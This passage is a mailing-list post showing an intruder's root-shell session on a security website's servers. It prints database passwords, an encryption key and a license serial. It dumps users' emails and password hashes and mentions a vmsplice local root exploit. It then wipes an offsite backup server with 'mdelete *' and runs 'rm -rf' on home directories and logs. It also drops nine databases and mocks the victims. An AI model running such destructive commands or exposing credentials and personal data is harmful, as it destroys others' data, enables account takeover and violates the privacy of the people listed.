	sh-3.2# cd /home
	sh-3.2# ls -la
	total 120
	drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
	drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
	drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
	-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
	-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
	drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
	drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
	drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
	drwx--x--x 10 com     com      4096 Apr 28 12:40 com
	drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
	drwx------  3 jon     jon      4096 Sep 21  2007 jon
	drwx------  2 root    root    16384 Sep 11  2007 lost+found
	drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
	drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
	drwx------  2 jon     jon      4096 Sep 15  2007 test
	drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
	
	sh-3.2# cd admin
	sh-3.2# ls -la
	total 1735896
	drwx--x--x  9 admin admin       4096 Nov 28  2007 .
	drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
	drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
	drwx------  2 admin admin       4096 Sep 28  2007 backups
	-rw-------  1 admin admin        860 Sep 17  2008 .bash_history
	-rw-r--r--  1 admin admin         24 Sep 14  2007 .bash_logout
	-rw-r--r--  1 admin admin        176 Sep 14  2007 .bash_profile
	-rw-r--r--  1 admin admin        124 Sep 14  2007 .bashrc
	drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
	drwx--x--x  6 admin admin       4096 Sep 21  2007 domains
	drwxrwx---  3 admin mail        4096 Sep 21  2007 imap
	-rw-r--r--  1 root  root          24 Sep 21  2007 info.php
	drwx------  2 admin admin       4096 Sep 21  2007 mail
	-rw-r--r--  1 root  root         716 Nov 28  2007 server.csr
	-rw-r--r--  1 root  root         887 Nov 28  2007 server.key
	-rw-r-----  1 admin mail          34 Sep 14  2007 .shadow
	-rw-r-----  1 admin com   1775711054 Oct 25  2007
	user.admin.com.tar.gz
	drwx--x--x  2 admin admin       4096 Jul 29  2008 user_backups
	
	sh-3.2# ..
	sh-3.2# cd jon
	sh-3.2# ls -la
	total 36
	drwx------  3 jon  jon  4096 Sep 21  2007 .
	drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
	-rw-------  1 jon  jon    53 Sep 21  2007 .bash_history
	-rw-r--r--  1 jon  jon    24 Sep 21  2007 .bash_logout
	-rw-r--r--  1 jon  jon   176 Sep 21  2007 .bash_profile
	-rw-r--r--  1 jon  jon   124 Sep 21  2007 .bashrc
	-rw-r--r--  1 root root   24 Sep 21  2007 info.php
	drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
	
	sh-3.2# cd ..
	sh-3.2# cd test
	sh-3.2# ls -la
	total 48
	drwx------  2 jon  jon  4096 Sep 15  2007 .
	drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
	-rw-------  1 jon  jon    79 Sep 21  2007 .bash_history
	-rw-r--r--  1 jon  jon    24 Sep 15  2007 .bash_logout
	-rw-r--r--  1 jon  jon   176 Sep 15  2007 .bash_profile
	-rw-r--r--  1 jon  jon   124 Sep 15  2007 .bashrc
	sh-3.2# cat .bash_history
	/usr/bin/mysqladmin -u root password PoliuJhytg67
	
	sh-3.2# cd ..
	sh-3.2# cd astanet
	sh-3.2# ls -la
	total 52
	drwx--x--x  6 astanet astanet 4096 Jun  4 09:51 .
	drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
	drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
	-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
	-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
	-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
	-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
	drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
	drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
	drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
	-rw-------  1 astanet astanet  197 Jun  4 09:51 .mysql_history
	lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html ->
	./domains/astalavista.net/public_html
	-rw-r----- <http://astalavista.net/public_html-rw-r----->   1 astanet mail      34 Dec 22 12:41 .shadow
	
	sh-3.2# cd auth/
	sh-3.2# ls -la
	total 28
	drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
	drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..
	-rw-r--r-- 1 root    root     321 Jan  5  2006
	hackercontest.config.inc.php
	-rw-r--r-- 1 root    root     319 Jan  5  2006
	hosting.config.inc.php
	-rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd
	-rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
	-rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
	
	sh-3.2# cat hackercontest.config.inc.php
	<?PHP
	// Variabeln f?r Verbindung zur Datenbank //
	$conxHost = 'localhost';                       // MySQL hostname
	$conxUser = 'hackercontest';
	// MySQL user
	$conxPassword = 'K6m@...c';                    // MySQL password
	$bfkey = 'cXvB3981';                                       //
	Encryption/Decryption Key for Blowfish
	?>
	sh-3.2# cat hosting.config.inc.php
	<?PHP
	// Variabeln f?r Verbindung zur Datenbank //
	$conxHost = 'localhost';                       // MySQL hostname
	$conxUser = 'hostinguser';                                 // MySQL
	user
	$conxPassword = 'cXvB3981';                    // MySQL password
	$bfkey = 'cXvB3981';                                       //
	Encryption/Decryption Key for Blowfish
	?>
	
	sh-3.2# cd ..
	sh-3.2# cd com
	sh-3.2# ls -la
	total 141208
	drwx--x--x 10 com  com       4096 Apr 28 12:40 .
	drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
	drwx------  2 com  com       4096 Jun  4 04:04 backups
	-rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql
	drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
	-rw-------  1 com  com      21880 Jun  2 08:07 .bash_history
	-rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout
	-rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile
	-rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc
	drwx--x--x  3 com  com       4096 Jan 29  2008 domains
	-rw-r--r--  1 com  com      16409 Jul 16  2008
	FWUser.class.php.fixed
	drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap
	-rw-------  1 com  com         69 Nov 18  2008 .lesshst
	drwx------  2 com  com       4096 Sep 24  2007 mail
	-rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history
	drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
	lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html ->
	./domains/astalavista.com/public_html
	-rw-r----- <http://astalavista.com/public_html-rw-r----->   1 com  mail        34 Sep 24  2007 .shadow
	drwx------  2 com  com       4096 Aug 26  2008 .ssh
	-rwx------  1 com  com       8515 Feb 10  2008 t
	-rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c
	drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
	-rw-rw-r--  1 com  com        617 May 20  2008 .toprc
	-rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-
	20080519-0900.sql
	-rw-------  1 com  com      16629 Mar 28 21:46 .viminfo
	-rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc
	
	sh-3.2# head t.c
	/*
	 * jessica_biel_naked_in_my_bed.c
	 *
	 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
	 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
	 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
	 *
	 * Linux vmsplice Local Root Exploit
	 * By qaaz
	 *
	
	sh-3.2# cd /
	sh-3.2# ls -la
	total 360
	drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
	drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
	-rw-------   1 root root  10240 Jun  3 02:39 aquota.group
	-rw-------   1 root root  10240 Jun  3 02:39 aquota.user
	-rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db
	-rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck
	-rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel
	drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
	drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
	drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
	drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
	drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
	drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
	-rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf
	drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
	drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
	drwx------   2 root root  16384 Sep 11  2007 lost+found
	drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
	drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
	drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
	-rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg
	drwxr-xr-x   2 root root      0 Jun  3 02:43 net
	drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
	dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
	drwxr-x---  15 root root   4096 Jun  4 08:40 root
	drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
	drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
	drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
	drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
	drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
	drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
	drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
	
	sh-3.2# cd opt
	sh-3.2# ls -la
	total 20
	drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
	drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
	drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
	
	sh-3.2# cd lsws/
	sh-3.2# ls -la
	total 108
	drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
	drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
	drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
	drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
	drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
	drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
	drwx------  4 apache apache  4096 Jun  3 02:43 conf
	drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
	drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
	drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
	drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
	-rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE
	-rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
	-rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
	-rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP
	drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
	drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
	drwx------  2 apache apache  4096 Mar 20  2008 phpbuild
	drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
	-rw-r--r--  1 root   root       6 May 29 15:10 VERSION
	
	sh-3.2# cd conf
	sh-3.2# ls -la
	total 48
	drwx------  4 apache apache 4096 Jun  3 02:43 .
	drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
	drwx------  2 apache apache 4096 Mar 20  2008 cert
	-rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml
	-rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
	-rw-r--r--  1 root   apache    0 Jun  3 14:11 .last
	-rw-------  1 apache apache  256 May 29 15:10 license.key
	-rw-------  1 apache apache  256 Mar 21  2008 license.key.old
	-rw-------  1 apache apache 3320 Mar 20  2008 mime.properties
	-rw-------  1 apache apache   20 May 29 15:10 serial.no
	drwx------  2 apache apache 4096 Mar 20  2008 templates
	
	sh-3.2# cat serial.no
	IbDl-oVsO-CKqL-wVRa
	
	sh-3.2# mysql
	Welcome to the MySQL monitor.  Commands end with ; or \g.
	Your MySQL connection id is 286844
	Server version: 5.0.45-community-log MySQL Community Edition (GPL)
	
	Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
	
	mysql> show databases;
	+-----------------------+
	| Database              |
	+-----------------------+
	| information_schema    |
	| astanet_ads           |
	| astanet_mailing_lists |
	| astanet_mediawiki     |
	| astanet_membersystem  |
	| com_contrexx          |
	| com_contrexx2         |
	| com_contrexx2_live    |
	| da_roundcube          |
	| dolphin               |
	| ideapool              |
	| mysql                 |
	| test                  |
	| yourmaster            |
	+-----------------------+
	14 rows in set (0.00 sec)
	
	mysql> use ideapool
	Database changed
	mysql> show tables;
	+-----------------------------------+
	| Tables_in_ideapool                |
	+-----------------------------------+
	| eventum_columns_to_display        |
	| eventum_custom_field              |
	| eventum_custom_field_option       |
	| eventum_custom_filter             |
	| eventum_customer_account_manager  |
	| eventum_customer_note             |
	| eventum_email_account             |
	| eventum_email_draft               |
	| eventum_email_draft_recipient     |
	| eventum_email_response            |
	| eventum_faq                       |
	| eventum_faq_support_level         |
	| eventum_group                     |
	| eventum_history_type              |
	| eventum_irc_notice                |
	| eventum_issue                     |
	| eventum_issue_association         |
	| eventum_issue_attachment          |
	| eventum_issue_attachment_file     |
	| eventum_issue_checkin             |
	| eventum_issue_custom_field        |
	| eventum_issue_history             |
	| eventum_issue_quarantine          |
	| eventum_issue_requirement         |
	| eventum_issue_user                |
	| eventum_issue_user_replier        |
	| eventum_link_filter               |
	| eventum_mail_queue                |
	| eventum_mail_queue_log            |
	| eventum_news                      |
	| eventum_note                      |
	| eventum_phone_support             |
	| eventum_project                   |
	| eventum_project_category          |
	| eventum_project_custom_field      |
	| eventum_project_email_response    |
	| eventum_project_field_display     |
	| eventum_project_group             |
	| eventum_project_link_filter       |
	| eventum_project_news              |
	| eventum_project_phone_category    |
	| eventum_project_priority          |
	| eventum_project_release           |
	| eventum_project_round_robin       |
	| eventum_project_status            |
	| eventum_project_status_date       |
	| eventum_project_user              |
	| eventum_reminder_action           |
	| eventum_reminder_action_list      |
	| eventum_reminder_action_type      |
	| eventum_reminder_field            |
	| eventum_reminder_history          |
	| eventum_reminder_level            |
	| eventum_reminder_level_condition  |
	| eventum_reminder_operator         |
	| eventum_reminder_priority         |
	| eventum_reminder_requirement      |
	| eventum_reminder_triggered_action |
	| eventum_resolution                |
	| eventum_round_robin_user          |
	| eventum_search_profile            |
	| eventum_status                    |
	| eventum_subscription              |
	| eventum_subscription_type         |
	| eventum_support_email             |
	| eventum_support_email_body        |
	| eventum_time_tracking             |
	| eventum_time_tracking_category    |
	| eventum_user                      |
	+-----------------------------------+
	69 rows in set (0.00 sec)
	
	mysql> describe eventum_user;
	+-------------------------+------------------+------+-----+---------
	------------+----------------+
	| Field                   | Type             | Null | Key | Default
	           | Extra          |
	+-------------------------+------------------+------+-----+---------
	------------+----------------+
	| usr_id                  | int(11) unsigned | NO   | PRI | NULL
	           | auto_increment |
	| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL
	           |                |
	| usr_customer_id         | int(11) unsigned | YES  |     | NULL
	           |                |
	| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL
	           |                |
	| usr_created_date        | datetime         | NO   |     | 0000-00-
	00 00:00:00 |                |
	| usr_status              | varchar(8)       | NO   |     | active
	           |                |
	| usr_password            | varchar(32)      | NO   |     |
	           |                |
	| usr_full_name           | varchar(255)     | NO   |     |
	           |                |
	| usr_email               | varchar(255)     | NO   | UNI |
	           |                |
	| usr_preferences         | longtext         | YES  |     | NULL
	           |                |
	| usr_sms_email           | varchar(255)     | YES  |     | NULL
	           |                |
	| usr_clocked_in          | tinyint(1)       | YES  |     | 0
	           |                |
	| usr_lang                | varchar(5)       | YES  |     | NULL
	           |                |
	+-------------------------+------------------+------+-----+---------
	------------+----------------+
	13 rows in set (0.00 sec)
	
	mysql> select usr_full_name,usr_email,usr_password from
	eventum_user;
	+----------------------+-------------------------------+------------
	----------------------+
	| usr_full_name        | usr_email                     |
	usr_password                     |
	+----------------------+-------------------------------+------------
	----------------------+
	| system               | system-account@...mple.com    |
	14589714398751513457adf349173434 |
	| Developer (Paulo)    | paulo.santos@...alavista.ch   |
	26a35a1cf8895c27fb37ef4cf149f7bb |
	| Be1er0ph0r           | be1er0ph0r@....de             |
	229766dc0ca1fb67160a8782321dfdce |
	| Admin                | pascal.mittner@...alavista.ch |
	57c2877c1d84c4b49f3289657deca65c |
	| ADMIN                | admin@...alavista.ch          |
	f6fdffe48c908deb0f4c3bd36c032e72 |
	| USER                 | user@...alavista.ch           |
	5cc32e366c87c4cb49e4309b75f57d64 |
	| Glafkos - (nowayout) | glafkos@...alavista.com       |
	f7735ab119023a8abb2301e67f81cd67 |
	| Joao                 | joao.pontes@...alavista.net   |
	f805c071d7c823b937448c54c047b9fd |
	| Pascal               | pm@...alavista.ch             |
	e10adc3949ba59abbe56e057f20f883e |
	| commander            | commander@...alavista.com     |
	932cd250918f881d41feb0b93883a926 |
	| ishtus               | ishtus@...alavista.com        |
	a587ffc88b3dbbba3fd2fe67af649ff0 |
	| sykadul              | sykadul@...alavista.com       |
	20224a2f3eeb57a13a10b4df543c128e |
	| Zach McElroy         | admin@...foo.net              |
	33c5d4954da881814420f3ba39772644 |
	| usb                  | usbenigma@...hmail.com        |
	b513f22c3db6932855ad732f5f8a10a2 |
	| cyph3r               | cyph3r@...alavista.com        |
	6e1e50017a945e874d52ec91f9ab2cee |
	+----------------------+-------------------------------+------------
	----------------------+
	15 rows in set (0.00 sec)
	
	mysql> select iss_description from eventum_issue where iss_id = 43;
	+-------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------+
	| iss_description
	
	
	
	
	
	
	
	
	             |
	+-------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------+
	| Ok guys, to boost our traffic and revenue what we have to do is
	keep users logged in... how to do that? well think about it... if a
	user is watching a movie... he'll be connected for 90 mins...
	120mins... so what i propose is something like:
	http://www.surfthechannel.com/
	since they only provide LINKS to the movies they are LEGAL and
	don't break DMCA rules... so we could do the same... "iframe" the
	content on our website or use a system like podcast that uses our
	own flash player to stream content from other places, therefore the
	content NOT BEING HOSTED ON OUR SERVERS but only viewed... which
	doesn't break any laws as far as i am aware (we should research on
	that just to be sure though!) Of course we would have to provide
	users with the button to take the content off if they think it
	breaks copyright laws and we will remove it... i think that makes
	it on the border of DMCA...
	
	We could also put advertisement during play on the flash video
	player itself... extra $$...
	
	By sykadul |
	+-------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------+
	1 row in set (0.00 sec)
	
	// Money and extra $$ is all they care about. remember that.
	
	mysql> select iss_summary,iss_description from eventum_issue where
	iss_id =42;
	+------------------------+------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	---------------------------------------------------------+
	| iss_summary            | iss_description
	
	
	                                                        |
	+------------------------+------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	---------------------------------------------------------+
	| Forum for REAL EXPERTS | Hello,
	
	                               Ishtus and I,
	
	                               Came up with a crazy and very workable and professional idea.
	We create an invitation only forum with the BEST security experts
	worldwide ONLY. Security Experts from Bugtraq lists, exploit
	writters, reverse engineers etc..
	
	                               One example a friend of mine from coresecurity.com!
	
	                               We could have big projects etc.. and we can work all together
	to bring to the security community exploits, open source software
	etc..
	
	|
	+------------------------+------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------------------
	--------------------------------------------------------+
	1 row in set (0.00 sec)
	
	// What an awesome yet original idea Ishtus and him... bring MORE
	security "experts", thats exactly what the world needs...
	
	mysql> select iss_summary,iss_description from eventum_issue where
	iss_id = 16;
	+------------------+------------------------------------------------
	---------------------------------------------+
	| iss_summary      | iss_description
	                                            |
	+------------------+------------------------------------------------
	---------------------------------------------+
	| Website guidance | Virtual Girl which guides you trought the
	website.
	
	                       We need a girl with who you can ( talk )!!!
	                       Also for the News!
	                       So my suggestion is a girl who read you the news loud if you
	like!
	                       you can choose between read yourselfe or she read it for you or
	both!
	
	                       Go to www.heise.de! There is an example for Voice News! It's a
	good thing!!!
	
	                       Have a look on the example girls!!
	
	                       http://www.yaoti.com/de/free_yaoti.html
	
	                       or that
	
	                       http://www.yellostrom.de/
	
	|
	+------------------+------------------------------------------------
	---------------------------------------------+
	1 row in set (0.00 sec)
	
	// ha ha.
	
	mysql> select iss_summary,iss_description from eventum_issue where
	iss_id = 7;
	+--------------------------+----------------------------------------
	-------------------------------------------------------------------+
	| iss_summary              | iss_description
	                                                                  |
	+--------------------------+----------------------------------------
	-------------------------------------------------------------------+
	| Exploit Development Team | We need an exploit development team to
	focus on exploit research and publication under Astalavista name.  |
	+--------------------------+----------------------------------------
	-------------------------------------------------------------------+
	1 row in set (0.00 sec)
	
	// LOL.
	
	mysql> exit
	Bye
	
	
	sh-3.2# ftp 212.254.194.163
	Connected to 212.254.194.163.
	220 BackupCOM_VW FTP server ready.
	504 AUTH: security mechanism 'GSSAPI' not supported.
	504 AUTH: security mechanism 'KERBEROS_V4' not supported.
	KERBEROS_V4 rejected as an authentication type
	Name (212.254.194.163:root): astalavista.com
	331 Password required for astalavista.com.
	Password:
	230 User astalavista.com logged in.
	Remote system type is UNIX.
	Using binary mode to transfer files.
	ftp> ls -la
	227 Entering Passive Mode (212,254,194,163,2,188)
	150 Opening BINARY mode data connection for 'file list'.
	dr-x------   1 root users         4096 Jun  4 06:13 astalavista.com
	226 Transfer complete.
	ftp> cd astalavista.com
	250 CWD command successful.
	ftp> ls -la
	227 Entering Passive Mode (212,254,194,163,2,189)
	150 Opening BINARY mode data connection for 'file list'.
	-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10
	09-04-28-astacom_full.tar
	-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18
	09-04-28-astacom_full.tar.bz2
	-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57
	09-04-29-astacom_sql_full.sql.tar.bz2
	-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21
	09-05-01-astacom-Public_HTML.tar
	-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29
	09-05-01-astacom-SQL_Dump.tar
	[snip]
	226 Transfer complete.
	ftp> mdelete *
	ftp> ls -la
	227 Entering Passive Mode (212,254,194,163,2,193)
	150 Opening BINARY mode data connection for 'file list'.
	226 Transfer complete.
	ftp>
	
	sh-3.2# cd /home
	sh-3.2# ls -la
	total 120
	drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
	drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
	drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
	-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
	-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
	drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
	drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
	drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
	drwx--x--x 10 com     com      4096 Apr 28 12:40 com
	drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
	drwx------  3 jon     jon      4096 Sep 21  2007 jon
	drwx------  2 root    root    16384 Sep 11  2007 lost+found
	drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
	drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
	drwx------  2 jon     jon      4096 Sep 15  2007 test
	drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
	
	sh-3.2# rm -rf backup/
	sh-3.2# rm -rf backup.14161/
	sh-3.2# rm -rf ftp/
	sh-3.2# rm -rf jon/
	sh-3.2# rm -rf my/
	sh-3.2# rm -rf mysqldata/
	sh-3.2# rm -rf test/
	sh-3.2# rm -rf tmp/
	sh-3.2# cd ~
	sh-3.2# rm -rf *
	sh-3.2# rm -rf /var/log/
	rm: cannot remove directory `/var/log//proftpd': Directory not empty
	sh-3.2# rm -rf /home/*
	sh-3.2# mysql
	Welcome to the MySQL monitor.  Commands end with ; or \g.
	Your MySQL connection id is 407156
	Server version: 5.0.45-community-log MySQL Community Edition (GPL)
	
	Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
	
	mysql> show databases;
	+-----------------------+
	| Database              |
	+-----------------------+
	| information_schema    |
	| astanet_ads           |
	| astanet_mailing_lists |
	| astanet_mediawiki     |
	| astanet_membersystem  |
	| com_contrexx          |
	| com_contrexx2         |
	| com_contrexx2_live    |
	| da_roundcube          |
	| dolphin               |
	| ideapool              |
	| mysql                 |
	| test                  |
	| yourmaster            |
	+-----------------------+
	14 rows in set (0.03 sec)
	
	mysql> drop database astanet_membersystem;
	droQuery OK, 46 rows affected (0.81 sec)
	
	mysql> drop database com_contrexx;
	Query OK, 211 rows affected (2.72 sec)
	
	mysql> drop database com_contrexx2;
	Query OK, 237 rows affected (2.23 sec)
	
	mysql> drop database com_contrexx2_live;
	Query OK, 227 rows affected (7.63 sec)
	
	mysql> drop database ideapool;
	Query OK, 69 rows affected (0.19 sec)
	
	mysql> drop database yourmaster;
	Query OK, 158 rows affected (0.55 sec)
	
	mysql> drop database astanet_ads;
	Query OK, 9 rows affected (0.11 sec)
	
	mysql> drop database astanet_mailing_lists;
	Query OK, 24 rows affected (1.47 sec)
	
	mysql> drop database astanet_mediawiki;
	Query OK, 31 rows affected (0.51 sec)
	
	mysql> show databases;
	+--------------------+
	| Database           |
	+--------------------+
	| information_schema |
	| da_roundcube       |
	| dolphin            |
	| mysql              |
	| test               |
	+--------------------+
	5 rows in set (0.00 sec)
	
	
	What a journey! We're not sure exactly why the "Terminator" had any
	influence on
	their naming (conventions) but we're sure Arnold himself wouldn't
	be in the
	wrong to say this pack of morons *wont be back*.
	
	--
	Explore Africa with a luxurious safari vacation. Click now!
	 http://tagline.hushmail.com/fc/BLSrjkqibJ4YFlT0yWUQGlcnCi5pjZKvouw2zmCrKTyocKlZVTVGpO7c11G/
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.grok.org.uk/full-disclosure-charter.html
	Hosted and sponsored by Secunia - http://secunia.com/



Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ